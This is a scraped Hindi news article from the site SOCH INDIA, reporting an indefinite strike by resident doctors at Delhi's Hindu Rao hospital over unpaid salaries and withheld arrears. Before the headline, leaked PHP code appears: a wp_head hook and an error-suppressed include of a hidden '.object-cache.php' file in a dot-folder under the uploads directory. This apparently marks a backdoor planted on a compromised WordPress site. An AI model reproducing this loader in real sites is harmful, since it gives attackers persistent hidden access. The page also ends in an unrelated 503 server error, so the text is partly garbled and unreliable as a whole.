add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिल्ली के हिंदूराव अस्पताल में हड़ताल पर गए रेजिडेंट डॉक्टर, OPD बाधित होने से मरीज़ बेहाल – SOCH INDIA
Menu

देश
दिल्ली के हिंदूराव अस्पताल में हड़ताल पर गए रेजिडेंट डॉक्टर, OPD बाधित होने से मरीज़ बेहाल

nobanner

राजधानी दिल्ली के सबसे बड़े अस्पतालों में से एक हिंदूराव अस्पताल में एक बार फिर अव्यवस्था का मंजर है. रेजिडेंट डॉक्टर हड़ताल पर चले गए हैं, जिससे ओपीडी का काम बाधित है और मरीजों को परेशानी उठानी पड़ रही है. रेजिडेंट डॉक्टरों का आरोप है कि इन्हें तीन महीने से सैलरी नहीं मिली. साथ ही साथ डीए भी रोक दिया गया है.

पिछले साल भी की थी हड़ताल

NDMC के इस हॉस्पिटल में हर साल इस तरह की परेशानी आती है. पिछले साल भी सैलरी रुकने पर डॉक्टरों ने हड़ताल की थी, जिसके बाद से प्रशासन की तरफ से समस्या का समाधान करने के आश्वासन के बाद डॉक्टरों ने हड़ताल खत्म कर दी थी. आश्वासन के बावजूद एक बार फिर अस्पताल प्रशासन और NDMC की तरफ से लापरवाही हो रही है.

सातवें वेतन आयोग का एरियर भी अभी नहीं दिया- डॉक्टर

डॉक्टरों का कहना है कि पिछली बार भी इन्होंने आश्वासन दिया पर हमारी एक भी मांग पूरी नहीं की. लिखित में दिया था कि सैलरी पास करेंगे, मगर फिर भी सैलरी पेंडिंग करने लगे. सातवें वेतन आयोग का एरियर भी अभी नहीं दिया. हड़ताल की वजह से मरीजों को परेशानी न हो इसलिए अभी एमरजेंसी सर्विस पर कोई रोक नहीं लगी है, मगर ओपीडी सेवा प्रभावित हो रही है.

डॉक्टरों का कहना है कि हड़ताल अनिश्चितकालीन है. जबतक प्रशासन उनसे बात कर के मामले को हल नहीं करता डॉक्टर हड़ताल करते रहेंगे. बार बार इस तरह की परेशानी की वजह से अब घर चलना भी मुश्किल हो गया है. पैसे दूसरों से मांग कर के घर का खर्च चलाना पड़ रहा है. बार बार डॉक्टरों के हड़ताल पर जाने के बाद भी हिन्दूराव अस्पताल में डॉक्टरों की सैलरी समय से नहीं आती. जिसकी वजह से डॉक्टरों के साथ साथ मरीजों को भी परेशानी सामना करना पड़ता है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.